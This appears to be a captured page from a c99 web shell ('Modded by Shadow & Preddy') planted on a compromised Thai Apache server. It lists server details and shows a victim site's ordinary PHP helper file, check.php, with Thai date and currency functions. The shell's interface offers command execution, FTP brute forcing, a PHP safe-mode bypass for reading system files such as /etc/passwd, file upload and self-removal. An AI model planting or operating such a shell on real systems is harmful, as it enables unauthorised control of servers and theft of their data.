!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/calendar/   drwxr-xr-x
Free 51 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     check.php (2.46 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
 
// แสดงค่า error ต่างๆที่รับเข้ามา
function msg($st){
    echo 
"    
    <form  name='form1' method='post' action='javascript:history.back(1)'>
    <table width='50%'  border='1' align='center' cellpadding='0' cellspacing='0' bordercolor='#0000FF'>
  <tr><td bgcolor='#0000FF'><font color='#FFFFFF' ><b>เกิดข้อผิดพลาด</b></font></td>
  </tr><tr>
    <td><br><font color='red'><center>"
.$st."</center></font><br>
            <div align='center'>
          <input type='submit' name='Submit' value='ตกลง'>
        </div>
          </td>
  </tr></table> </form> 
"
;
exit();
}
// ตรวจสอบ form ทั้งหมด
function check_form($formdata){
foreach (
$formdata as $key => $value){ 
if (!isset(
$key) || $value == "" )
return 
false;
}
return 
true;
}
//แปลงจากตัวเลขเป็นจำนวนเงิน
function intToMoney($num){
$num=intval($num);
$ed=strlen($num)%3;
$str=substr($num,0,$ed); 
for(
$i=$ed;$i<strlen($num);$i+=3)
$str=$str.",".substr($num,$i,3);
if(
$ed==0)
$str=substr($str,1,strlen($str));
return 
$str;
}
//วันที่ของปี
function dayofyear($date){
$yy=substr($date,0,4);$mm=substr($date,5,2);$dd=substr($date,8,2);
$m=array();
$m['01']=0;$m['02']=31;$m['03']=59;$m['04']=90;$m['05']=120;$m['06']=151;
$m['07']=181;$m['08']=212;$m['09']=243;$m['10']=273;$m['11']=304;$m['12']=334;
$day=$m[$mm];
if((
$yy%4==0)&&($mm>"02"))
$dayofyear=$day+$dd+1;
else
$dayofyear=$day+$dd;
return 
$dayofyear;
}
 
//หาจำนวนวันเริ่มจากวันที่เริมต้นถึงวันที่สิ้นสุด
function numDay($st_date,$ed_date){
$st_y=substr($st_date,0,4);
$ed_y=substr($ed_date,0,4);
$st_dofy=dayofyear($st_date);
$ed_dofy=dayofyear($ed_date);
if(
$st_y<>$ed_y){
for(
$i=$st_y;$i<=$ed_y;$i++){        
        if(
$i%4==0)
        
$day=366;
        else 
        
$day=365;
        if(
$i==$st_y)
        
$day=$day-$st_dofy;
        if(
$i==$ed_y)
        
$day=$ed_dofy;
        
$num=$num+$day;
}
}else{
$num=$ed_dofy-$st_dofy;
}return 
$num;
}
//ฟังก์ชั่น วันที่
function dateThai($date){
    
$_month_name = array("01"=>"มกราคม","02"=>"กุมภาพันธ์","03"=>"มีนาคม","04"=>"เมษายน","05"=>"พฤษภาคม","06"=>"มิถุนายน","07"=>"กรกฏาคม","08"=>"สิงหาคม","09"=>"กันยายน","10"=>"ตุลาคม","11"=>"พฤศจิกายน","12"=>"ธันวาคม");
    
$yy=substr($date,0,4);$mm=substr($date,5,2);$dd=substr($date,8,2);$time=substr($date,11,8);
    
$yy+=543;
    
$dateT=intval($dd)." ".$_month_name[$mm]." ".$yy." ".$time;
    return 
$dateT;
    }


?>
<script language=javascript>
//แสดง dialog เตือนการลบข้อมูล
    function del(varUrl)
    {
        if (window.confirm("ยืนยันการลบข้อมูล")==true)
        {
            window.open(varUrl,"_self")
        }
    }
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.006 ]--